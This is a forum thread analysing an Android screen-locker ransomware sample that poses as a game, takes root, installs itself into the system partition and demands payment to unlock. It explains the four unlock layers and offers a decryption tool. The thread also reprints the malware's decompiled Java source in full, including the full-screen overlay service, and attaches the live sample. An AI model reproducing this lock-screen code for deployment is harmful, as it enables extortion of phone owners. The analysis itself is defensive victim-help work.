4层加密+另类MD5加密的锁机软件
本帖最后由 云在天 于 2018-11-14 18:41 编辑2018年1月12日23点01分,被坛友从MacOS拖到window来看看这个作者又更新了算法。HG1,HG2,HG3,HG4方式不变,后面的中文变量改变了计算方式
新的解锁工具:链接: https://pan.baidu.com/s/1mjv1pmK 密码: 5h6b
--------------------------------------------------------------------------------------------------------------------------------写在前面 有些坛友说想私下讨论或者联系方式,咱还是尊重论坛的规定吧。要是你想讨论锁机这类的可以把样本发到样本区@我一下,我会看的,也会出下面这种分析的。By the way,加强壳的就算了 脱壳技术就是鸡肋
废话不多说直奔主题
求助帖:手机被锁机,求大神帮忙找到解锁密码 @默笑458
因为好久没有逆向这种锁机软件了,所以思想还是停留在单纯的AES/DES的基础上
第一步:先拖进模拟器,先搞清楚他是怎么运行的。
生成了一个比较流行游戏的图标,然后点击运行
然后出现申请Root权限,我这里点的允许,如果点拒绝,看代码是会让你百度什么是root
允许以后,他会在system里安装一个time.apk就是这个不变的人生了,然后会自动运行并设置为开机自启。毫无疑问,这个新安装的程序就是我们要找的主程序
上图就是锁机以后的样子。我们通过adb把这个apk下载到本地,然后拖进Android Killer,然后JD-gui打开,拖到JEB里也可以,不过本机的JEB抽风了。。。。
通过AK我们得知人口点是hg666,我们就从这里下手
package com.hg.qq2840484641;
import adrt.ADRTLogCatReader;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
public class hg666
extends Activity
{
@Override
protected void onCreate(Bundle paramBundle)
{
ADRTLogCatReader.onContext(this, "com.aide.ui");
super.onCreate(paramBundle);
setContentView(2130903041);
try
{
paramBundle = Class.forName("com.hg.qq2840484641.HG");//这里是调用的方法
startService(new Intent(this, paramBundle));
return;
}
catch (ClassNotFoundException paramBundle)
{
throw new NoClassDefFoundError(paramBundle.getMessage());
}
}
}
我们进到HG里面去看,代码太长了,我还是改回截图吧
这是一堆的定义值,我们继续往下看
this.HG1 = ((int)(Math.random() * 1000000));
this.HG2 = ((int)(Math.random() * 1000000));
this.HG3 = ((int)(Math.random() * 1000000));
this.HG4 = ((int)(Math.random() * 1000000));
this.幻殇 = (this.HG1 + 1);
this.似梦 = (this.HG2 + 10);
this.绿绮 = (this.HG3 + 100);
this.如烟 = (this.HG4 + 1100);
this.tv1.setText(幻光.huanguang("" + this.HG1));
this.tv2.setText("你的解锁序列号为:");
this.tv3.setText("解锁加QQ:" + paramString);
this.tv4.setText("解锁滴滴,没钱勿扰。");
this.tv5.setText("My 潇洒先生");
this.bt.setText("解除锁定");
this.bt.setOnClickListener(new View.OnClickListener()
我解释下这小段的意思,定义了HG1-HG4四个随机数长度为6位,然后又分别在4个随机数基础上加了1,10,100,1100做了4个变量,然后调用‘幻光.huanguang’这个方法来计算序列号,然后显示出来,再监听按钮点击事件,再往后就是4组判断了
先放一张大图,然后我解析其中两段
if (HG.access$L1000004(HG.this).getText().toString().isEmpty()) {}//这里是判断不为空就进行下一步判断
do
{
return;
if (HG.access$L1000004(HG.this).getText().toString().equals("" + HG.this.幻殇)) //这是输入的值与幻殇这个值比较
{
HG.access$L1000005(HG.this).setText(幻光.huanguang("" + HG.this.HG2));
HG.access$L1000006(HG.this).setText("你的解锁序列号为:");
HG.access$L1000008(HG.this).setText("暮霞如烟,浮云千幻");
HG.access$L1000009(HG.this).setText("欢迎来到第二层");
HG.access$L1000003(HG.this).setText("解除锁定");
return;
}
第一个IF是判断输入值是不是空值,不是空值下一步判断
第二个if是判断输入值与幻殇这个值是不是相等,相等执行下一步。
我们先来看幻殇这个值是怎么来的,是HG1+1得到的,想要得到幻殇这个值,就需要得到HG1,那HG1又是个随机数,我们就要找哪里体现了这个随机数
【this.tv1.setText(幻光.huanguang("" + this.HG1));】这个地方执行这个方法后得到序列号,而这个方法的参数就是HG1,我们去看看这个方法
package com.hg.;
public class 幻光
{
private static String hexString = "0123456789";
public static String huanguang(String paramString)
{
int j = 0;
paramString = paramString.getBytes();
StringBuilder localStringBuilder = new StringBuilder(paramString.length * 2);
int i = 0;
String[] arrayOfString1;
String[] arrayOfString2;
if (i >= paramString.length)
{
paramString = "";
arrayOfString1 = new String;
arrayOfString1 = "0";
arrayOfString1 = "1";
arrayOfString1 = "2";
arrayOfString1 = "3";
arrayOfString1 = "4";
arrayOfString1 = "5";
arrayOfString1 = "6";
arrayOfString1 = "7";
arrayOfString1 = "8";
arrayOfString1 = "9";
arrayOfString2 = new String;
arrayOfString2 = "A";
arrayOfString2 = "B";
arrayOfString2 = "C";
arrayOfString2 = "D";
arrayOfString2 = "E";
arrayOfString2 = "F";
arrayOfString2 = "G";
arrayOfString2 = "H";
arrayOfString2 = "I";
arrayOfString2 = "J";
i = j;
}
for (;;)
{
if (i >= 10)
{
return paramString;
localStringBuilder.append(hexString.charAt((paramString & 0xF) >> 0));
i += 1;
break;
}
if (i == 0) {
paramString = localStringBuilder.toString().replace(arrayOfString1, arrayOfString2);
}
paramString = paramString.replace(arrayOfString1, arrayOfString2);
i += 1;
}
}
}
分析可知,这就是个文本替换,我用易语言写了一个例子,大家应该能看懂
这是逆运算,这个方法的运算就是
0 1 2 3 4 5 6 7 8 9
A B C D E F G H I J
这样依次替换。
我们输入序列号进行逆运算后得到HG1,然后HG1+1得到幻殇的值,就是第一层密码
工具是临时做的,有点简陋,输入第一层密码后弹出第二次密码的输入框,框里就是解锁第一层的密码
我们点击解除锁定,来到第二层,看上面的代码第二层和第一层算法是一样的,所以我们就不分析了,直接到第三层
第三层如图
if (HG.access$L1000004(HG.this).getText().toString().equals(幻光2.GetMD5Code("" + HG.this.绿绮)))
{
HG.access$L1000005(HG.this).setText(幻光.huanguang("" + HG.this.HG4));
HG.access$L1000006(HG.this).setText("你的解锁序列号为:");
HG.access$L1000008(HG.this).setText("已悲境相空,复作泡云灭");
HG.access$L1000009(HG.this).setText("欢迎来到最后一层,解锁完这层你就可以正常使用手机了");
HG.access$L1000003(HG.this).setText("解除锁定");
return;
看表面我以为第三层只是普通的MD5加密,试了一下不对,所以还是继续跟方法
package com.hg.qq2840484641;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
public class 幻光2
{
private static final String[] strDigits = { "9", "8", "7", "6", "5", "4", "3", "2", "1", "0", "a", "b", "c", "d", "e", "f" };
public static String GetMD5Code(String paramString)
{
String str2 = (String)null;
try
{
String str1 = new String(paramString);
localNoSuchAlgorithmException1.printStackTrace();
}
catch (NoSuchAlgorithmException localNoSuchAlgorithmException1)
{
try
{
paramString = byteToString(MessageDigest.getInstance("MD5").digest(paramString.getBytes()));
return paramString;
}
catch (NoSuchAlgorithmException localNoSuchAlgorithmException3)
{
for (;;)
{
paramString = localNoSuchAlgorithmException1;
NoSuchAlgorithmException localNoSuchAlgorithmException2 = localNoSuchAlgorithmException3;
}
}
localNoSuchAlgorithmException1 = localNoSuchAlgorithmException1;
paramString = str2;
}
return paramString;
}
private static String byteToArrayString(byte paramByte)
{
int i = paramByte;
if (paramByte < 0) {
i = paramByte + 256;
}
paramByte = i / 16;
return strDigits + strDigits[(i % 16)];
}
private static String byteToString(byte[] paramArrayOfByte)
{
StringBuffer localStringBuffer = new StringBuffer();
int i = 0;
for (;;)
{
if (i >= paramArrayOfByte.length) {
return localStringBuffer.toString();
}
localStringBuffer.append(byteToArrayString(paramArrayOfByte));
i += 1;
}
}
}
乍一看和普通MD5加密无异,细细分析才知道他改了MD5里的默认数组【不知道到底叫啥姑且叫这个吧】,我们找一段MD5加密的JAVA代码更改数组以后调试,成功
因为不知道易语言MD5加密怎么改,又懒得写JS代码,所以直接POST了调试代码,所以工具的第三步开始就有点慢了,等会我会贴代码,会的大神写个工具让我学习学习
第四层和第三层算法一样就不再赘述了
最后用卸载工具卸载掉这个APK就可以了。
【解锁工具】
链接: https://pan.baidu.com/s/1qYuVuVy 密码: 53s9
【样本】 直接安装就是锁机程序了,不会请求root权限,安装慎重!!!!!
【主代码】package com.hg.qq2840484641;
import adrt.ADRTLogCatReader;
import android.app.Application;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.text.Editable;
import android.view.LayoutInflater;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.view.WindowManager.LayoutParams;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
public class HG
extends Service
{
int HG1;
int HG2;
int HG3;
int HG4;
private Button bt;
private EditText ed;
private View mFloatLayout;
private WindowManager mWindowManager;
private TextView tv1;
private TextView tv2;
private TextView tv3;
private TextView tv4;
private TextView tv5;
private WindowManager.LayoutParams wmParams;
long 似梦;
long 如烟;
long 幻殇;
long 绿绮;
private void HG(String paramString)
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
getApplication();
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
this.wmParams.type = 2010;
this.wmParams.format = 1;
this.wmParams.flags = 1280;
this.wmParams.gravity = 48;
this.wmParams.x = 0;
this.wmParams.y = 0;
this.wmParams.width = -1;
this.wmParams.height = -1;
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903040, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
this.bt = ((Button)this.mFloatLayout.findViewById(2131099652));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131099651));
this.tv1 = ((TextView)this.mFloatLayout.findViewById(2131099654));
this.tv2 = ((TextView)this.mFloatLayout.findViewById(2131099653));
this.tv3 = ((TextView)this.mFloatLayout.findViewById(2131099650));
this.tv4 = ((TextView)this.mFloatLayout.findViewById(2131099649));
this.tv5 = ((TextView)this.mFloatLayout.findViewById(2131099648));
this.HG1 = ((int)(Math.random() * 1000000));
this.HG2 = ((int)(Math.random() * 1000000));
this.HG3 = ((int)(Math.random() * 1000000));
this.HG4 = ((int)(Math.random() * 1000000));
this.幻殇 = (this.HG1 + 1);
this.似梦 = (this.HG2 + 10);
this.绿绮 = (this.HG3 + 100);
this.如烟 = (this.HG4 + 1100);
this.tv1.setText(幻光.huanguang("" + this.HG1));
this.tv2.setText("你的解锁序列号为:");
this.tv3.setText("解锁加QQ:" + paramString);
this.tv4.setText("解锁滴滴,没钱勿扰。");
this.tv5.setText("My 潇洒先生");
this.bt.setText("解除锁定");
this.bt.setOnClickListener(new View.OnClickListener()
{
@Override
public void onClick(View paramAnonymousView)
{
if (HG.access$L1000004(HG.this).getText().toString().isEmpty()) {}
do
{
return;
if (HG.access$L1000004(HG.this).getText().toString().equals("" + HG.this.幻殇))
{
HG.access$L1000005(HG.this).setText(幻光.huanguang("" + HG.this.HG2));
HG.access$L1000006(HG.this).setText("你的解锁序列号为:");
HG.access$L1000008(HG.this).setText("暮霞如烟,浮云千幻");
HG.access$L1000009(HG.this).setText("欢迎来到第二层");
HG.access$L1000003(HG.this).setText("解除锁定");
return;
}
if (HG.access$L1000004(HG.this).getText().toString().equals("" + HG.this.似梦))
{
HG.access$L1000005(HG.this).setText(幻光.huanguang("" + HG.this.HG3));
HG.access$L1000006(HG.this).setText("你的解锁序列号为:");
HG.access$L1000008(HG.this).setText("水花凝幻质,墨彩染空尘");
HG.access$L1000009(HG.this).setText("欢迎来到第三层");
HG.access$L1000003(HG.this).setText("解除锁定");
return;
}
if (HG.access$L1000004(HG.this).getText().toString().equals(幻光2.GetMD5Code("" + HG.this.绿绮)))
{
HG.access$L1000005(HG.this).setText(幻光.huanguang("" + HG.this.HG4));
HG.access$L1000006(HG.this).setText("你的解锁序列号为:");
HG.access$L1000008(HG.this).setText("已悲境相空,复作泡云灭");
HG.access$L1000009(HG.this).setText("欢迎来到最后一层,解锁完这层你就可以正常使用手机了");
HG.access$L1000003(HG.this).setText("解除锁定");
return;
}
} while (!HG.access$L1000004(HG.this).getText().toString().equals(幻光2.GetMD5Code("" + HG.this.如烟)));
HG.access$L1000001(HG.this).removeView(HG.access$L1000002(HG.this));
}
});
}
@Override
public IBinder onBind(Intent paramIntent)
{
return (IBinder)null;
}
@Override
public void onCreate()
{
ADRTLogCatReader.onContext(this, "com.aide.ui");
super.onCreate();
}
@Override
public void onStart(Intent paramIntent, int paramInt)
{
HG("2856437148");
super.onStart(paramIntent, paramInt);
}
}
【字符替换代码】
package com.hg.qq2840484641;
public class 幻光
{
private static String hexString = "0123456789";
public static String huanguang(String paramString)
{
int j = 0;
paramString = paramString.getBytes();
StringBuilder localStringBuilder = new StringBuilder(paramString.length * 2);
int i = 0;
String[] arrayOfString1;
String[] arrayOfString2;
if (i >= paramString.length)
{
paramString = "";
arrayOfString1 = new String;
arrayOfString1 = "0";
arrayOfString1 = "1";
arrayOfString1 = "2";
arrayOfString1 = "3";
arrayOfString1 = "4";
arrayOfString1 = "5";
arrayOfString1 = "6";
arrayOfString1 = "7";
arrayOfString1 = "8";
arrayOfString1 = "9";
arrayOfString2 = new String;
arrayOfString2 = "A";
arrayOfString2 = "B";
arrayOfString2 = "C";
arrayOfString2 = "D";
arrayOfString2 = "E";
arrayOfString2 = "F";
arrayOfString2 = "G";
arrayOfString2 = "H";
arrayOfString2 = "I";
arrayOfString2 = "J";
i = j;
}
for (;;)
{
if (i >= 10)
{
return paramString;
localStringBuilder.append(hexString.charAt((paramString & 0xF) >> 0));
i += 1;
break;
}
if (i == 0) {
paramString = localStringBuilder.toString().replace(arrayOfString1, arrayOfString2);
}
paramString = paramString.replace(arrayOfString1, arrayOfString2);
i += 1;
}
}
}
【异形MD5加密代码】
package com.hg.qq2840484641;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
public class 幻光2
{
private static final String[] strDigits = { "9", "8", "7", "6", "5", "4", "3", "2", "1", "0", "a", "b", "c", "d", "e", "f" };
public static String GetMD5Code(String paramString)
{
String str2 = (String)null;
try
{
String str1 = new String(paramString);
localNoSuchAlgorithmException1.printStackTrace();
}
catch (NoSuchAlgorithmException localNoSuchAlgorithmException1)
{
try
{
paramString = byteToString(MessageDigest.getInstance("MD5").digest(paramString.getBytes()));
return paramString;
}
catch (NoSuchAlgorithmException localNoSuchAlgorithmException3)
{
for (;;)
{
paramString = localNoSuchAlgorithmException1;
NoSuchAlgorithmException localNoSuchAlgorithmException2 = localNoSuchAlgorithmException3;
}
}
localNoSuchAlgorithmException1 = localNoSuchAlgorithmException1;
paramString = str2;
}
return paramString;
}
private static String byteToArrayString(byte paramByte)
{
int i = paramByte;
if (paramByte < 0) {
i = paramByte + 256;
}
paramByte = i / 16;
return strDigits + strDigits[(i % 16)];
}
private static String byteToString(byte[] paramArrayOfByte)
{
StringBuffer localStringBuffer = new StringBuffer();
int i = 0;
for (;;)
{
if (i >= paramArrayOfByte.length) {
return localStringBuffer.toString();
}
localStringBuffer.append(byteToArrayString(paramArrayOfByte));
i += 1;
}
}
}
【附件】样本直接安装为锁屏程序,慎重安装!!!
写在最后:不要贪图小便宜!!如果我的帖子有帮助到你,请你评下分,免费的!!!
建议楼主以后不要把锁机代码发出来,吾爱论坛里面会有人会拿这个代码再做一个一样的去骗人,被骗的人有的人没玩吾爱上当了没法解锁,就算有玩吾爱论坛,有的人不一定看到这个解锁帖子(转播提醒大家) 本帖最后由 云在天 于 2018-1-3 16:20 编辑
yiwai2012 发表于 2018-1-3 16:17
按我自己想的来说只能改这里吧 但是貌似结果不一样呢
修改前正常的MD5
这个层数可能我说的比较模糊。
我把源码给你看看吧
var hexcase = 0;
var b64pad = "";
var chrsz = 8;
function hex_md5(s) {
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
}
function b64_md5(s) {
return binl2b64(core_md5(str2binl(s), s.length * chrsz))
}
function str_md5(s) {
return binl2str(core_md5(str2binl(s), s.length * chrsz))
}
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
}
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
}
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
}
function md5_vm_test() {
return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72"
}
function core_md5(x, len) {
x |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for (var i = 0; i < x.length; i += 16) {
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = md5_ff(a, b, c, d, x, 7, -680876936);
d = md5_ff(d, a, b, c, x, 12, -389564586);
c = md5_ff(c, d, a, b, x, 17, 606105819);
b = md5_ff(b, c, d, a, x, 22, -1044525330);
a = md5_ff(a, b, c, d, x, 7, -176418897);
d = md5_ff(d, a, b, c, x, 12, 1200080426);
c = md5_ff(c, d, a, b, x, 17, -1473231341);
b = md5_ff(b, c, d, a, x, 22, -45705983);
a = md5_ff(a, b, c, d, x, 7, 1770035416);
d = md5_ff(d, a, b, c, x, 12, -1958414417);
c = md5_ff(c, d, a, b, x, 17, -42063);
b = md5_ff(b, c, d, a, x, 22, -1990404162);
a = md5_ff(a, b, c, d, x, 7, 1804603682);
d = md5_ff(d, a, b, c, x, 12, -40341101);
c = md5_ff(c, d, a, b, x, 17, -1502002290);
b = md5_ff(b, c, d, a, x, 22, 1236535329);
a = md5_gg(a, b, c, d, x, 5, -165796510);
d = md5_gg(d, a, b, c, x, 9, -1069501632);
c = md5_gg(c, d, a, b, x, 14, 643717713);
b = md5_gg(b, c, d, a, x, 20, -373897302);
a = md5_gg(a, b, c, d, x, 5, -701558691);
d = md5_gg(d, a, b, c, x, 9, 38016083);
c = md5_gg(c, d, a, b, x, 14, -660478335);
b = md5_gg(b, c, d, a, x, 20, -405537848);
a = md5_gg(a, b, c, d, x, 5, 568446438);
d = md5_gg(d, a, b, c, x, 9, -1019803690);
c = md5_gg(c, d, a, b, x, 14, -187363961);
b = md5_gg(b, c, d, a, x, 20, 1163531501);
a = md5_gg(a, b, c, d, x, 5, -1444681467);
d = md5_gg(d, a, b, c, x, 9, -51403784);
c = md5_gg(c, d, a, b, x, 14, 1735328473);
b = md5_gg(b, c, d, a, x, 20, -1926607734);
a = md5_hh(a, b, c, d, x, 4, -378558);
d = md5_hh(d, a, b, c, x, 11, -2022574463);
c = md5_hh(c, d, a, b, x, 16, 1839030562);
b = md5_hh(b, c, d, a, x, 23, -35309556);
a = md5_hh(a, b, c, d, x, 4, -1530992060);
d = md5_hh(d, a, b, c, x, 11, 1272893353);
c = md5_hh(c, d, a, b, x, 16, -155497632);
b = md5_hh(b, c, d, a, x, 23, -1094730640);
a = md5_hh(a, b, c, d, x, 4, 681279174);
d = md5_hh(d, a, b, c, x, 11, -358537222);
c = md5_hh(c, d, a, b, x, 16, -722521979);
b = md5_hh(b, c, d, a, x, 23, 76029189);
a = md5_hh(a, b, c, d, x, 4, -640364487);
d = md5_hh(d, a, b, c, x, 11, -421815835);
c = md5_hh(c, d, a, b, x, 16, 530742520);
b = md5_hh(b, c, d, a, x, 23, -995338651);
a = md5_ii(a, b, c, d, x, 6, -198630844);
d = md5_ii(d, a, b, c, x, 10, 1126891415);
c = md5_ii(c, d, a, b, x, 15, -1416354905);
b = md5_ii(b, c, d, a, x, 21, -57434055);
a = md5_ii(a, b, c, d, x, 6, 1700485571);
d = md5_ii(d, a, b, c, x, 10, -1894986606);
c = md5_ii(c, d, a, b, x, 15, -1051523);
b = md5_ii(b, c, d, a, x, 21, -2054922799);
a = md5_ii(a, b, c, d, x, 6, 1873313359);
d = md5_ii(d, a, b, c, x, 10, -30611744);
c = md5_ii(c, d, a, b, x, 15, -1560198380);
b = md5_ii(b, c, d, a, x, 21, 1309151649);
a = md5_ii(a, b, c, d, x, 6, -145523070);
d = md5_ii(d, a, b, c, x, 10, -1120210379);
c = md5_ii(c, d, a, b, x, 15, 718787259);
b = md5_ii(b, c, d, a, x, 21, -343485551);
a = safe_add(a, olda);
b = safe_add(b, oldb);
c = safe_add(c, oldc);
d = safe_add(d, oldd)
}
return Array(a, b, c, d)
}
function md5_cmn(q, a, b, x, s, t) {
return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s), b)
}
function md5_ff(a, b, c, d, x, s, t) {
return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t)
}
function md5_gg(a, b, c, d, x, s, t) {
return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t)
}
function md5_hh(a, b, c, d, x, s, t) {
return md5_cmn(b ^ c ^ d, a, b, x, s, t)
}
function md5_ii(a, b, c, d, x, s, t) {
return md5_cmn(c ^ (b | (~d)), a, b, x, s, t)
}
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);
var ipad = Array(16),
opad = Array(16);
for (var i = 0; i < 16; i++) {
ipad = bkey ^ 0x36363636;
opad = bkey ^ 0x5C5C5C5C
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128)
}
function safe_add(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF)
}
function bit_rol(num, cnt) {
return (num << cnt) | (num >>> (32 - cnt))
}
function str2binl(str) {
var bin = Array();
var mask = (1 << chrsz) - 1;
for (var i = 0; i < str.length * chrsz; i += chrsz) bin |= (str.charCodeAt(i / chrsz) & mask) << (i % 32);
return bin
}
function binl2str(bin) {
var str = "";
var mask = (1 << chrsz) - 1;
for (var i = 0; i < bin.length * 32; i += chrsz) str += String.fromCharCode((bin >>> (i % 32)) & mask);
return str
}
function binl2hex(binarray) {
var hex_tab = hexcase ? "9876543210ABCDEF" : "9876543210abcdef";
var str = "";
for (var i = 0; i < binarray.length * 4; i++) {
str += hex_tab.charAt((binarray >> ((i % 4) * 8 + 4)) & 0xF) + hex_tab.charAt((binarray >> ((i % 4) * 8)) & 0xF)
}
return str
}
function binl2b64(binarray) {
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var str = "";
for (var i = 0; i < binarray.length * 4; i += 3) {
var triplet = (((binarray >> 8 * (i % 4)) & 0xFF) << 16) | (((binarray >> 8 * ((i + 1) % 4)) & 0xFF) << 8) | ((binarray >> 8 * ((i + 2) % 4)) & 0xFF);
for (var j = 0; j < 4; j++) {
if (i * 8 + j * 6 > binarray.length * 32) str += b64pad;
else str += tab.charAt((triplet >> 6 * (3 - j)) & 0x3F)
}
}
return str
} 谢谢精彩分享!!!! 现在解个锁还一层一层的,好有趣。楼主好棒 贪小便宜的人容易 中招 直接连电脑,shell命令获取到root权限,直接删除这些J8程序不就行了。 小伎俩,咳咳 呵呵,呵呵而过。 感谢楼主分析 最讨厌这种勒索的 勒索软件,就是拦路抢劫 谢谢楼主分享